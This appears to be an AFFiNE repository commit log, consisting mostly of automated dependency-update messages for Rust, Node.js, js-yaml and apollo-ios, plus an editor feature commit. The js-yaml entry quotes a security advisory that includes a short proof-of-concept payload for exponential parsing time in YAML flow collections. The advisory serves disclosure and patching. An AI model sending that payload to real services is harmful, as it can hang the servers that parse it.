(Sysix)

##### 📚 Documentation

-
[`dadafe3`](https://redirect.github.com/oxc-project/oxc/commit/dadafe3)
oxlint, oxfmt: Mention migrate skills in npm READMEs
([#&#8203;22965](https://redirect.github.com/oxc-project/oxc/issues/22965))
(Boshen)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-31 17:08:39 +08:00
renovate[bot] df86d52594 chore: bump up Rust to v1.97.1 (#15389)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [rust](https://rust-lang.org/)
([source](https://redirect.github.com/rust-lang/rust),
[changelog](https://redirect.github.com/rust-lang/rust/blob/main/RELEASES.md))
| toolchain | minor | `1.96.0` → `1.97.1` |

---

### Release Notes

<details>
<summary>rust-lang/rust (rust)</summary>

###
[`v1.97.1`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1971-2026-07-16)

[Compare
Source](https://redirect.github.com/rust-lang/rust/compare/1.97.0...1.97.1)

\==========================

<a id="1.97.1"></a>

- [rustc: Fix miscompilation in LLVM
optimization](https://redirect.github.com/rust-lang/rust/issues/159035)
This backports an LLVM submodule bump to include the LLVM-side fix and a
revert of the rustc change that is one known trigger for the bug. The
rustc
side revert should not be strictly necessary but is done out of
abundance of caution.

###
[`v1.97.0`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1970-2026-07-09)

[Compare
Source](https://redirect.github.com/rust-lang/rust/compare/1.96.1...1.97.0)

\==========================

<a id="1.97.0-Language"></a>

## Language

- [Consider `Result<T, Uninhabited>` and `ControlFlow<Uninhabited, T>`
to be equivalent to `T` for must use
lint](https://redirect.github.com/rust-lang/rust/pull/148214)
- [Add allow-by-default `dead_code_pub_in_binary` lint for unused pub
items in binary
crates](https://redirect.github.com/rust-lang/rust/pull/149509)
- [Stabilize the `div32`, `lam-bh`, `lamcas`, `ld-seq-sa` and `scq`
target features](https://redirect.github.com/rust-lang/rust/pull/154510)
- [Stabilize
`cfg(target_has_atomic_primitive_alignment)`](https://redirect.github.com/rust-lang/rust/pull/155006)
- [Allow trailing `self` in imports in more
cases](https://redirect.github.com/rust-lang/rust/pull/155137)

<a id="1.97.0-Platform-Support"></a>

## Platform Support

- [nvptx64-nvidia-cuda: drop support for old architectures and old
ISAs](https://redirect.github.com/rust-lang/rust/pull/152443)

Refer to Rust's [platform support page][platform-support-doc]
for more information on Rust's tiered platform support.

[platform-support-doc]:
https://doc.rust-lang.org/rustc/platform-support.html

<a id="1.97.0-Stabilized-APIs"></a>

## Stabilized APIs

- [`Default for
RepeatN`](https://doc.rust-lang.org/stable/std/iter/struct.RepeatN.html#impl-Default-for-RepeatN%3CA%3E)
- [`Copy for
ffi::FromBytesUntilNulError`](https://doc.rust-lang.org/stable/std/ffi/struct.FromBytesUntilNulError.html#impl-Copy-for-FromBytesUntilNulError)
- [`Send for std::fs::File` on
UEFI](https://redirect.github.com/rust-lang/rust/pull/154003)
-
[`<{integer}>::isolate_highest_one`](https://doc.rust-lang.org/stable/std/primitive.u32.html#method.isolate_highest_one)
-
[`<{integer}>::isolate_lowest_one`](https://doc.rust-lang.org/stable/std/primitive.u32.html#method.isolate_lowest_one)
-
[`<{integer}>::highest_one`](https://doc.rust-lang.org/stable/std/primitive.u32.html#method.highest_one)
-
[`<{integer}>::lowest_one`](https://doc.rust-lang.org/stable/std/primitive.u32.html#method.lowest_one)
-
[`<{integer}>::bit_width`](https://doc.rust-lang.org/stable/std/primitive.u32.html#method.bit_width)
-
[`NonZero<{integer}>::isolate_highest_one`](https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.isolate_highest_one)
-
[`NonZero<{integer}>::isolate_lowest_one`](https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.isolate_lowest_one)
-
[`NonZero<{integer}>::highest_one`](https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.highest_one)
-
[`NonZero<{integer}>::lowest_one`](https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.lowest_one)
-
[`NonZero<{integer}>::bit_width`](https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.bit_width)

These previously stable APIs are now stable in const contexts:

-
[`char::is_control`](https://doc.rust-lang.org/stable/std/primitive.char.html#method.is_control)

<a id="1.97.0-Cargo"></a>

## Cargo

- [Stabilize `build.warnings`
config.](https://redirect.github.com/rust-lang/cargo/pull/16796) This
controls how lint warnings from local packages are treated. Useful for
enforcing a warning-free build in CI, replacing `-Dwarnings`.
[docs](https://doc.rust-lang.org/nightly/cargo/reference/config.html#buildwarnings)
- [Stabilize `resolver.lockfile-path`
config.](https://redirect.github.com/rust-lang/cargo/pull/16694) This
allows specifying the path to the lockfile to use when resolving
dependencies. Useful when working with read-only source directories.
[docs](https://doc.rust-lang.org/nightly/cargo/reference/config.html#resolverlockfile-path)
- [cargo-clean: Error when `--target-dir` doesn't look like a Cargo
target
directory.](https://redirect.github.com/rust-lang/cargo/pull/16712) This
prevents accidental deletion of non-target directories.
- [Add `-m` shorthand for
`--manifest-path`](https://redirect.github.com/rust-lang/cargo/pull/16858)
- [Remove `curl` dependency from `crates-io`
crate](https://redirect.github.com/rust-lang/cargo/pull/16936)

<a id="1.97.0-Rustdoc"></a>

## Rustdoc

- [Stabilize `--emit`
flag](https://redirect.github.com/rust-lang/rust/pull/146220)
- [Stabilize
`--remap-path-prefix`](https://redirect.github.com/rust-lang/rust/pull/155307)

<a id="1.97.0-Compatibility-Notes"></a>

## Compatibility Notes

- [Emit a future-compatibility warning when relying on `f32:
From<{float}>` to constrain
`{float}`](https://redirect.github.com/rust-lang/rust/pull/139087)
- [Rust will use the v0 symbol mangling scheme by
default.](https://redirect.github.com/rust-lang/rust/pull/151994) This
may cause some tools (such as debuggers or profilers, especially with
old versions) to fail to demangle symbols emitted by Rust. It may also
cause the formatting of text in backtraces to change.
- [Prevent deref coercions in `pin!`, in order to prevent
unsoundness.](https://redirect.github.com/rust-lang/rust/pull/153457)
The most likely case where this might impact users is: writing `pin!(x)`
where `x` has type `&mut T` will now always correctly produce a value of
type `Pin<&mut &mut T>`, instead of sometimes allowing a coercion that
produces a value of type `Pin<&mut T>`. This coercion was previously
incorrectly allowed since Rust 1.88.0.
- [Deprecate `std::char` constants and
functions](https://redirect.github.com/rust-lang/rust/pull/153873)
- [Warn on linker output by
default](https://redirect.github.com/rust-lang/rust/pull/153968)
- [Remove hidden `f64` methods which have been deprecated since
1.0](https://redirect.github.com/rust-lang/rust/pull/153975)
- [report the `varargs_without_pattern` lint in
deps](https://redirect.github.com/rust-lang/rust/pull/154599)
- [Forbid passing generic arguments to module path segments even if the
module reexports a generic enum
variant](https://redirect.github.com/rust-lang/rust/pull/154971)
- [Error on invalid macho `link_section`
specifier](https://redirect.github.com/rust-lang/rust/pull/155065)
- The encoding of certain `enum`s [have
changed](https://redirect.github.com/rust-lang/rust/pull/155473). This
is not a breaking change, as it only applies to `enum`s without layout
guarantees, but is noted here as we've seen people impacted from having
made assumptions about the layout algorithm.
- [Error on `#[export_name = "..."]` where the name is
empty](https://redirect.github.com/rust-lang/rust/pull/155515)
- [Syntactically reject tuple index shorthands in struct
patterns](https://redirect.github.com/rust-lang/rust/pull/155698)
- [validate `#[link_name = "..."]` & `#[link(name = "...")]`
parameters](https://redirect.github.com/rust-lang/rust/pull/155817)
- On Windows, after calling `shutdown` on a socket to shut down the
write side, attempting to write to the socket will now produce a
`BrokenPipe` error rather than `Other`. [Map `WSAESHUTDOWN` to
`io::ErrorKind::BrokenPipe`](https://redirect.github.com/rust-lang/rust/pull/156063)

###
[`v1.96.1`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1961-2026-06-30)

[Compare
Source](https://redirect.github.com/rust-lang/rust/compare/1.96.0...1.96.1)

\===========================

<a id="1.96.1"></a>

- [Cargo: fix timeout/retry
behavior](https://redirect.github.com/rust-lang/cargo/pull/17131)
- [Cargo: apply patches for CVE-2025-15661, CVE-2026-55199, and
CVE-2026-55200 to
libssh2](https://redirect.github.com/rust-lang/cargo/pull/17140)
- [rustc: fix miscompilation in MIR
optimization](https://redirect.github.com/rust-lang/rust/pull/158214)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-31 17:08:23 +08:00
MrX 6170a90785 feat(editor): add permanent global toggle for code block line numbers (#15381)
Add a persistent "Show line numbers in code blocks" setting to Editor
Settings that controls line-number visibility across all code blocks.
Individual blocks can still override the global default via the
per-block More menu toggle.

## Changes

- **schema.ts** - add `codeBlockLineNumbers: z.boolean().default(true)`
to `AffineEditorSettingSchema`
- **code-block.ts** - read `codeBlockLineNumbers` from
`EditorSettingProvider` reactively via a stable `signal(true)` updated
by `effect()` in `connectedCallback`; expose `showLineNumbers` getter as
single source of truth used by both `renderBlock()` and the toolbar
- **config.ts** - toolbar line-number toggle reads
`blockComponent.showLineNumbers` (resolved state) instead of
`model.props.lineNumber ?? true`
- **general.tsx** - add `DefaultCodeBlockLineNumberSettings` Switch row
in editor general settings
- **en.json + i18n.gen.ts** - add i18n strings for the new setting
- **line-numbers.spec.ts** - add 7 e2e tests covering default
visibility, global toggle on/off, per-block override in both directions,
multi-block, newly created blocks, and persistence across reload

## Behaviour

| State | Result |
|---|---|
| Global ON (default), no per-block override | Line numbers shown |
| Global OFF, no per-block override | Line numbers hidden |
| Global OFF, per-block explicitly ON | Line numbers shown |
| Global ON, per-block explicitly OFF | Line numbers hidden |
| Mobile (feature flag) | Always hidden regardless of settings |

## Notes

- Existing per-block toggle behaviour is fully preserved and unchanged
- Default is `true` so no regression for existing users
- The blocksuite-side reads `codeBlockLineNumbers` via a type cast (`as
Record<string, unknown>`) because the key lives in the AFFiNE-level
`EditorSettingSchema`, not in blocksuite's own `GeneralSettingSchema` -
this is an intentional architectural boundary

Closes #14965


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added a global setting to show or hide line numbers in code blocks by
default.
  * Added localized title and description text for the new setting.
  * Preserved per-code-block overrides through the block’s More menu.

* **Bug Fixes**
* Line-number visibility now stays consistent across existing and newly
created code blocks, including after reloads.

* **Tests**
* Added end-to-end coverage for defaults, overrides, persistence, and
multiple code blocks.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-07-31 17:07:43 +08:00
DarkSky 758b2260f8 feat(server): improve ci build (#15386)
#### PR Dependency Tree


* **PR #15386** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
  * Improved email rendering and formatting consistency.
* Preserved calendar synchronization windows while removing reliance on
date utility libraries.
* Enhanced cleanup of Prisma engine files, including deduplication and
space-saving reporting.

* **Tests**
  * Updated email snapshots to validate formatted HTML output.

* **Refactor**
* Streamlined email component usage and centralized email rendering
behavior.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-07-31 17:07:05 +08:00
renovate[bot] 5c38f1376c chore: bump up Node.js to v22.23.2 (#15384)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [node](https://nodejs.org)
([source](https://redirect.github.com/nodejs/node)) | patch | `22.23.1`
→ `22.23.2` |

---

### Release Notes

<details>
<summary>nodejs/node (node)</summary>

###
[`v22.23.2`](https://redirect.github.com/nodejs/node/releases/tag/v22.23.2):
2026-07-29, Version 22.23.2 'Jod' (LTS), @&#8203;marco-ippolito

[Compare
Source](https://redirect.github.com/nodejs/node/compare/v22.23.1...v22.23.2)

This is a security release.

##### Notable Changes

- (CVE-2026-56846) http2: retain header memory in session accounting
(Matteo Collina) – High
- (CVE-2026-56848) http2: defer rst stream while in scope (Matteo
Collina) – High
- (CVE-2026-58043) permission: avoid granting radix split nodes
(RafaelGSS) – High
- (CVE-2026-56850) https: distinguish PFX object-array agent keys
(RafaelGSS) – Medium
- (CVE-2026-58040) https: bind identity checks to session reuse (Matteo
Collina) – Medium
- (CVE-2026-58042) dns: handle large resolveAny address replies
(RafaelGSS) – Medium
- (CVE-2026-58045) zlib: throw on out-of-bounds write buffers
(RafaelGSS) – Medium
- (CVE-2026-56847) permission: enforce fs write permission for trace
events (RafaelGSS) – Low
- (CVE-2026-58039) permission: check final report output path
(RafaelGSS) – Low
- (CVE-2026-58044) http: reject requests exceeding max header count
(Matteo Collina) – Low
- deps: update llhttp to 9.4.3 (Paolo Insogna)
- deps: update undici to 6.28.0 (Node.js GitHub Bot)

##### Commits

-
\[[`4b12ac38a1`](https://redirect.github.com/nodejs/node/commit/4b12ac38a1)]
- **deps**: update llhttp to 9.4.3 (Paolo Insogna)
[nodejs-private/node-private#935](https://redirect.github.com/nodejs-private/node-private/pull/935)
-
\[[`3fd0aa51d0`](https://redirect.github.com/nodejs/node/commit/3fd0aa51d0)]
- **deps**: update undici to 6.28.0 (Node.js GitHub Bot)
[#&#8203;64714](https://redirect.github.com/nodejs/node/pull/64714)
-
\[[`22efc051a3`](https://redirect.github.com/nodejs/node/commit/22efc051a3)]
- **(CVE-2026-58042)** **dns**: handle large resolveAny address replies
(RafaelGSS)
[nodejs-private/node-private#929](https://redirect.github.com/nodejs-private/node-private/pull/929)
-
\[[`c8525ac3a6`](https://redirect.github.com/nodejs/node/commit/c8525ac3a6)]
- **(CVE-2026-58044)** **http**: reject requests exceeding max header
count (Matteo Collina)
[nodejs-private/node-private#932](https://redirect.github.com/nodejs-private/node-private/pull/932)
-
\[[`daa6d25e3d`](https://redirect.github.com/nodejs/node/commit/daa6d25e3d)]
- **(CVE-2026-56848)** **http2**: defer rst stream while in scope
(Matteo Collina)
[nodejs-private/node-private#921](https://redirect.github.com/nodejs-private/node-private/pull/921)
-
\[[`f14d78b9e0`](https://redirect.github.com/nodejs/node/commit/f14d78b9e0)]
- **(CVE-2026-56846)** **http2**: retain header memory in session
accounting (Matteo Collina)
[#&#8203;63752](https://redirect.github.com/nodejs/node/pull/63752)
-
\[[`51123159fe`](https://redirect.github.com/nodejs/node/commit/51123159fe)]
- **(CVE-2026-58040)** **https**: bind identity checks to session reuse
(Matteo Collina)
[nodejs-private/node-private#934](https://redirect.github.com/nodejs-private/node-private/pull/934)
-
\[[`acaf4266b2`](https://redirect.github.com/nodejs/node/commit/acaf4266b2)]
- **(CVE-2026-56850)** **https**: distinguish PFX object-array agent
keys (RafaelGSS)
[nodejs-private/node-private#930](https://redirect.github.com/nodejs-private/node-private/pull/930)
-
\[[`440329f624`](https://redirect.github.com/nodejs/node/commit/440329f624)]
- **(CVE-2026-58043)** **permission**: avoid granting radix split nodes
(RafaelGSS)
[nodejs-private/node-private#911](https://redirect.github.com/nodejs-private/node-private/pull/911)
-
\[[`ed18b9cc07`](https://redirect.github.com/nodejs/node/commit/ed18b9cc07)]
- **(CVE-2026-58039)** **permission**: check final report output path
(RafaelGSS)
[nodejs-private/node-private#926](https://redirect.github.com/nodejs-private/node-private/pull/926)
-
\[[`0566c3cccd`](https://redirect.github.com/nodejs/node/commit/0566c3cccd)]
- **(CVE-2026-56847)** **permission**: enforce fs write permission for
trace events (RafaelGSS)
[nodejs-private/node-private#927](https://redirect.github.com/nodejs-private/node-private/pull/927)
-
\[[`0d072480c3`](https://redirect.github.com/nodejs/node/commit/0d072480c3)]
- **(CVE-2026-58045)** **zlib**: throw on out-of-bounds write buffers
(RafaelGSS)
[nodejs-private/node-private#931](https://redirect.github.com/nodejs-private/node-private/pull/931)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-31 13:51:32 +08:00
renovate[bot] fb647b6003 chore: bump up js-yaml version to v5 [SECURITY] (#15385)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [js-yaml](https://redirect.github.com/nodeca/js-yaml) | [`^4.2.0` →
`^5.0.0`](https://renovatebot.com/diffs/npm/js-yaml/4.3.0/5.2.2) |
![age](https://developer.mend.io/api/mc/badges/age/npm/js-yaml/5.2.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/js-yaml/4.3.0/5.2.2?slim=true)
|

---

### js-yaml: Exponential parsing time in flow collections leads to
denial of service

[GHSA-pm4m-ph32-ghv5](https://redirect.github.com/advisories/GHSA-pm4m-ph32-ghv5)

<details>
<summary>More information</summary>

#### Details
##### Summary
Parsing a small YAML document can take exponential time. An application
that calls `load()` or `loadAll()` on untrusted input can be hung by a
payload under 200 bytes.

##### Details
When an entry in a flow sequence turns out to be a `key: value` pair,
the parser rewinds and parses that entry a second time as the key.
If the key is itself a nested flow sequence of the same shape, every
level is parsed twice, so the total work is O(2^n) in the nesting depth.
The default `maxDepth` of 100 does not help, because the time is already
unmanageable at about 30 to 40 levels.

Root cause, potentially the: `readFlowCollection` in
[parser.ts](https://redirect.github.com/nodeca/js-yaml/blob/master/src/parser/parser.ts),
the `restoreState` followed by a second `parseNode` further down.

##### PoC

```javascript
const yaml = require('js-yaml')
const n = 30
yaml.load('[ '.repeat(n) + '1' + ' ]: 0'.repeat(n))
```

With default options: 22 levels takes about 1 second, 26 levels about 17
seconds, 30 levels over 2 minutes. The input stays under 200 bytes and
grows linearly with `n`.

##### Impact
Denial of service. A single small request can keep one CPU busy for
minutes or longer and blocks the Node event loop, so one request can
stall the whole process. No anchors, aliases, merges, tags, or non
default options are required, and it reproduces on the default schema.

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
-
[https://github.com/nodeca/js-yaml/security/advisories/GHSA-pm4m-ph32-ghv5](https://redirect.github.com/nodeca/js-yaml/security/advisories/GHSA-pm4m-ph32-ghv5)
-
[https://github.com/nodeca/js-yaml/commit/3e5240f9cbe645ce5afb58524954a13c8539c853](https://redirect.github.com/nodeca/js-yaml/commit/3e5240f9cbe645ce5afb58524954a13c8539c853)
-
[https://github.com/nodeca/js-yaml/releases/tag/5.2.2](https://redirect.github.com/nodeca/js-yaml/releases/tag/5.2.2)
-
[https://github.com/advisories/GHSA-pm4m-ph32-ghv5](https://redirect.github.com/advisories/GHSA-pm4m-ph32-ghv5)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-pm4m-ph32-ghv5)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>nodeca/js-yaml (js-yaml)</summary>

###
[`v5.2.2`](https://redirect.github.com/nodeca/js-yaml/blob/HEAD/CHANGELOG.md#522---2026-07-24)

[Compare
Source](https://redirect.github.com/nodeca/js-yaml/compare/5.2.1...5.2.2)

##### Fixed

- Quote flow scalars where a colon precedes a flow indicator,
[#&#8203;773](https://redirect.github.com/nodeca/js-yaml/issues/773).

##### Security

- Avoid exponential parsing time for nested flow sequence pairs.

###
[`v5.2.1`](https://redirect.github.com/nodeca/js-yaml/blob/HEAD/CHANGELOG.md#521---2026-07-02)

[Compare
Source](https://redirect.github.com/nodeca/js-yaml/compare/5.2.0...5.2.1)

##### Fixed

- Add `Map` support to !!omap (should work when `realMapTag` used)

##### Security

- Remove quadratic complexity from !!omap `addItem`. Regression from v5
  (usually not critical, because YAML11\_SCHEMA is not default anymore).

###
[`v5.2.0`](https://redirect.github.com/nodeca/js-yaml/blob/HEAD/CHANGELOG.md#520---2026-06-26)

[Compare
Source](https://redirect.github.com/nodeca/js-yaml/compare/5.1.0...5.2.0)

##### Added

- Added `maxTotalMergeKeys` (10000) loader option to limit the total
number of
keys processed by YAML merge (`<<`) across one `load()` / `loadAll()`
call.
- Added `maxAliases` (-1) loader option to limit the number of YAML
aliases per
  document.

##### Removed

- `maxMergeSeqLength` replaced with `maxTotalMergeKeys` for limiting
YAML merge
  processing.

##### Fixed

- Round-trip of integers with exponential form (>= `1e21`)

###
[`v5.1.0`](https://redirect.github.com/nodeca/js-yaml/blob/HEAD/CHANGELOG.md#510---2026-06-23)

[Compare
Source](https://redirect.github.com/nodeca/js-yaml/compare/5.0.0...5.1.0)

##### Added

- Collection tags can finalize an incrementally populated carrier into a
  different result value.

##### Changed

- \[breaking] `quoteStyle` now selects the preferred quote style; use
the
  restored `forceQuotes` option to force quoting non-key strings.

###
[`v5.0.0`](https://redirect.github.com/nodeca/js-yaml/blob/HEAD/CHANGELOG.md#500---2026-06-20)

[Compare
Source](https://redirect.github.com/nodeca/js-yaml/compare/4.3.0...5.0.0)

##### Added

- Added named exports for schemas, tags, parser events and AST
utilities.
- Reworked `JSON_SCHEMA` and `CORE_SCHEMA` with spec-compliant scalar
resolution
  rules, and added `YAML11_SCHEMA`.
- Added `realMapTag` for lossless mappings with non-string and complex
keys.
Object-based mappings now reject complex keys instead of stringifying
them.
- Added `dump()` `transform` option for changing the generated AST
before
  rendering.
- Added `dump()` options `seqInlineFirst`, `flowBracketPadding`,
`flowSkipCommaSpace`, `flowSkipColonSpace`, `quoteFlowKeys`,
`quoteStyle` and
  `tagBeforeAnchor`.
- Added formal data layers (events and AST) for modular data pipelines.
  - Added low-level parser (to events), presenter and visitor APIs.
- Added the [YAML Test
Suite](https://redirect.github.com/yaml/yaml-test-suite) to the
  test set.

##### Changed

- See the [migration guide](docs/migrate_v4_to_v5.md) for upgrade notes.
- Rewritten in TypeScript and reorganized the public API around flat
named
  exports.
- Reduced the set of exported schemas:
  - YAML 1.2 schemas: `CORE_SCHEMA` (loader default), `JSON_SCHEMA`,
    `FAILSAFE_SCHEMA`.
- `YAML11_SCHEMA`, a combination of all YAML 1.1 tags (YAML 1.1 does not
    specify a schema, only "types").
- `load`/`dump` default behaviour is now specified exactly via schemas:
  - `load` uses `CORE_SCHEMA`, without `!!merge` by default.
- `dump` uses `YAML11_SCHEMA` + `CORE_SCHEMA` for the quoting check, to
    guarantee backward compatibility by default.
- `!!set` is now loaded as a JavaScript `Set`.
- Replaced the `Type` API with a tags API. Similar, but more precise and
  simpler. See examples for details. Tags can be defined via
`defineScalarTag()`, `defineSequenceTag()` and `defineMappingTag()`, or
as a
  spread + override of an existing tag.
- Renamed `Schema.extend()` to `Schema.withTags()`.
- Expanded YAML 1.2 conformance and improved handling of directives,
document
  markers, block keys, multiline scalars, tag syntax and other things.
- `load()` now throws on empty input instead of returning `undefined`.
- Moved browser builds to the `js-yaml/browser` export.
- Deprecated the `loadAll` signature with an iterator (still works, but
is a
  candidate for removal).

##### Removed

- Removed deprecated `safeLoad()`, `safeLoadAll()` and `safeDump()`
exports.
- Removed `DEFAULT_SCHEMA` and the nested `types` export.
- Removed loader options `onWarning`, `legacy` and `listener`.
- Removed dumper options `styles`, `replacer`, `noCompatMode`,
`condenseFlow`,
`quotingType` and `forceQuotes`. Renamed `noArrayIndent` to
`seqNoIndent`.
Formatting and representation are now configured through presenter
options,
  schemas and tag definitions. See migration guide on how to replace.
- Removed support for importing internal files from `lib/`.

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-31 13:50:48 +08:00
renovate[bot] 4f3ace6e7f chore: bump up apollographql/apollo-ios version to v1.25.7 (#13687)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[apollographql/apollo-ios](https://redirect.github.com/apollographql/apollo-ios)
| patch | `from: "1.25.4"` → `from: "1.25.7"` |
|
[apollographql/apollo-ios](https://redirect.github.com/apollographql/apollo-ios)
| patch | `1.25.4` → `1.25.7` |

---

### Release Notes

<details>
<summary>apollographql/apollo-ios (apollographql/apollo-ios)</summary>

###
[`v1.25.7`](https://redirect.github.com/apollographql/apollo-ios/releases/tag/1.25.7)

[Compare
Source](https://redirect.github.com/apollographql/apollo-ios/compare/1.25.6...1.25.7)

##### Improved

- **Expose `DatabaseRow` stored properties for `SQLiteDatabase`
extensibility
([#&#8203;1056](https://redirect.github.com/apollographql/apollo-ios-dev/pull/1056)):**
`DatabaseRow`'s stored properties (`cacheKey` and `storedInfo`) are now
`public`, complementing the public initializer added in
[#&#8203;664](https://redirect.github.com/apollographql/apollo-ios-dev/pull/664).
This lets adopters build wrapper or decorator implementations of the
public `SQLiteDatabase` protocol — for encryption, compression, logging,
metrics, and similar use cases — without duplicating Apollo's SQLite
implementation. This change only expands the public API surface and
introduces no behavioral changes. *Thank you to
[@&#8203;ErShubhShankar](https://redirect.github.com/ErShubhShankar) for
the contribution.*

###
[`v1.25.6`](https://redirect.github.com/apollographql/apollo-ios/releases/tag/1.25.6)

[Compare
Source](https://redirect.github.com/apollographql/apollo-ios/compare/1.25.5...1.25.6)

##### Fixed

- **Fix `\r\n` in GraphQL descriptions generating invalid Swift comments
([#&#8203;965](https://redirect.github.com/apollographql/apollo-ios-dev/pull/965)):**
GraphQL field descriptions containing `\r\n` (Windows CRLF) line endings
caused codegen to emit invalid Swift — only the first line received the
`///` doc comment prefix and subsequent lines were emitted as
uncommented text, breaking compilation. Backport of
[#&#8203;961](https://redirect.github.com/apollographql/apollo-ios-dev/pull/961).
Fixes
[#&#8203;3553](https://redirect.github.com/apollographql/apollo-ios/issues/3553).
*Thank you to
[@&#8203;iPhoneNoobDeveloper](https://redirect.github.com/iPhoneNoobDeveloper)
for the contribution.*

###
[`v1.25.5`](https://redirect.github.com/apollographql/apollo-ios/releases/tag/1.25.5)

[Compare
Source](https://redirect.github.com/apollographql/apollo-ios/compare/1.25.4...1.25.5)

##### Fixed

- **Fixed concurrency crash in `compileGraphQLResult` on Swift 6.3/macOS
26
([#&#8203;929](https://redirect.github.com/apollographql/apollo-ios-dev/pull/929)):**
Serialized `async let` calls in `compileGraphQLResult` to work around a
[Swift concurrency runtime
crash](https://redirect.github.com/swiftlang/swift/pull/87665) triggered
when code generation is used in an `AsyncParsableCommand`. See PR
[#&#8203;942](https://redirect.github.com/apollographql/apollo-ios-dev/pull/942).
*Thank you to [@&#8203;m4p](https://redirect.github.com/m4p) for the
contribution.*

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

